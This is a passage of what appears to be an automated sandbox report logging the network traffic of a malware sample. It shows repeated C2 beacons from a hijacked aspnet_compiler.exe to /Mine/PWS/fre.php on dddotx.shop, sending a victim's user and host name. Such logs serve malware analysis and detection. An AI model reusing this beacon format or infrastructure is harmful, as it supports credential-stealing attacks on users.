                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 176
                  Connection: close
                  Sep 25, 2024 15:28:37.787247896 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: 'ckav.rujones134349JONES-PC+0FDD42EE188E931437F4FBE2CatoE1
                  Sep 25, 2024 15:28:38.475661993 CEST561INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0XsUX3XgZvqZ8dvRLyh0Tae%2BF6G3vfbq6VSoRrdPb6EqohVU517Rv1BktkQ7gY3zOf4LhB%2FtQuwg%2BBYmu0agYCehTM%2BigkcgrqvlaA3agc92h259U8bZQb8hziMMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bc6b9f342fc-EWR
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449732188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:38.544929028 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:38.549981117 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:39.240874052 CEST579INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jmRWxvk%2FF%2B7m4F%2FOz1%2BVZYTqYewi9mxwwac1inb6YETltLvovYwz16ZsOGQb9ASpQXM9YTXCCFy%2BzSVe%2F7e%2B71D%2F6iHxEBmGTURdOh%2FWvWN7G4b7RVlOtp2jfoOBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bcb6815438b-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.449733188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:39.417495012 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:39.422339916 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:40.175534010 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FZfHpw5R3M0J12EljDtdW1ytxJT89wzT5CdW7RKt6Pno0EKM%2FCMU0gLB0HcmhNzqoCPVWec6tz725TyuijPkjNt5PPh%2FvNMO%2BvQt1%2BfH5yUXyGLca5TBaoFjvceLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bd0ed438cd4-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.449734188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:40.329387903 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:40.334278107 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:41.113013983 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2U1p7eDkJlqOhs9qnm5NQxCRqFW4eqgljVSCen09hiZ402lhYuyjNq7sj3fnzuCS3V%2FKGdncc%2F%2FLrzcNQLQ0%2Fg8iNfxr0y5ooE6OoGdMVGvj8eaSiTGfxvDiCHAZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bd69aea42c9-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449735188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:41.267832994 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:41.272882938 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:41.990243912 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wioAlAEMbQkipN2MwG8GDiYOseoIotRJd0Rh5QNazVCbbud%2Bq%2B0V4NPdFSBqKbveITUNHwe9VVaLWA5AtV4s2u385MVh0LVIcbtj%2FfMIoXPLvJdcYKT8iA7fqJQ6nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bdc79374251-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449736188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:42.149990082 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:42.154915094 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:42.844978094 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB9yGoVCx%2FkFD5TN42cUsXMt3ijaSYyGxXAoL6%2BsS37Dr9FDD3gKWRK6dMsTkqT3MwQDY%2F8fZPWB6tIH%2BhizLE%2FoJ4w63V3tXktH9plhQN5PoLzFWqpPAPn9BLpQuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5be1fbe072bc-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.449737188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:43.000952959 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:43.005872011 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:43.869628906 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzvV0zOHIpTP8DVXxLHNBUwLlZGnKeDaMeZXwNEol0fsg3a8xlvRrw%2FHotoF5Vr6crbHMrEicSE4H4eZmSrLwEaJvw6cUo3Zt6EMzbvcynCP8Q1C3UqVDHP0GKAzrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5be7699a8c29-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.449738188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:44.019629002 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:44.024460077 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:44.707027912 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E67iXCs2O93RwzjD9kPT1AcB0DOQ7qfQCK1v3u5GnB0J1xm32C9yqFK1D9DmguKcoYTLhSWLqqIPiAoT9%2Fk29Vlex1UTJEcxKO8P62sDAYFfmFWJgfUnEq38%2FGTJCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5beda9d041e6-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449739188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:44.860066891 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:44.864953041 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:45.626015902 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BuiDQ6Svr4d8lCW2K0zjebM%2B16WYG%2BtZHSk3vA4qVzAwlAOXinTcn73eB%2B2rHyEtnfGuD2AxwLQUIDlY6D0oRlkXeebiH9w05NfUR3%2FMG3J05o5IccC4ZDW8H3SRsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bf2fb4c729f-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449740188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:45.789467096 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:45.794466972 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:46.435095072 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTBvAeC4uqz98Lew63Y7zLv76oS8zLQ%2BNDl2Zxw1p95UMsdCuQdyuUsUbjrWWHlIeybuGKhhJujbLOMfzrpyLpFWflk8M1ESM6MU6QGjwb0i4t68gTo5D02xcolcfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bf8aef9c337-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449741188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:46.581696033 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:46.586604118 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:47.271536112 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJWOZwsYYbnj3hvE7B8LS5yUqCwrjQUKohvihvS8QpacDM3jg%2FMlWqxw%2FeoKBYZtJF6NyRwIOvS3aXQ5mXUOGq52A6Uiis0nBKsdkxTMXD824PCp6gc9R6pkf0pNFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bfdb8da3320-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449743188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:47.454394102 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:47.459805965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:48.160701036 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QE9YIl5d%2FC3im0M%2BQBTNxHQux7T2K4cmAJIDu80eMw8C67NnrYTi4FL1g9KIShbzTslME9FaygGpl%2F9s92Ma%2FtfZeEomgKIMDDX2oXuJyW0AnvWhgS5J%2Bk1HqIwndg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c033e370f37-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.449745188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:48.324156046 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:48.329147100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:49.039150953 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1hR8UKxf2PX2BE0NhsdpdLx%2BA9jdawS8%2BstnwWk8b%2BPXQqdhAfldm7uYQFgZ4BxMDLkULk7tnX%2BtSYRys%2FPU2TyZ%2Fw8KfogyfP3PTRhVr5xQmIT7VtGGETyRahU4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c089e267cf6-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.449747188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:49.194071054 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:49.199141979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:49.977329969 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jj8kaF9VMW7WOW%2BApWGzWucOFzNDg4tbbX0xC%2BtYy8v1QFoJKYYNRJ70Or%2FmNkt2LsbErSUwTYc%2BkXlHmEDUmK9KG6Pu0i%2B9LuA1Dy4B3OvdyVoNjPVgcGvCS4Oo9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c0e08074319-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.449749188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:50.183876991 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:50.188831091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:50.951734066 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJJBJgDBK0AOSujO5ipOMwowYULtlw%2B9cUDNPwdeEnxoUw425C5Vt6duFTg8TTE%2FuvWRZ3Hw%2F9kQYMlIcv0VQKCDAjjr%2B6q21sVqwW%2BrwriA9wwCTESoel7FG7h%2BTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c1429e94382-EWR
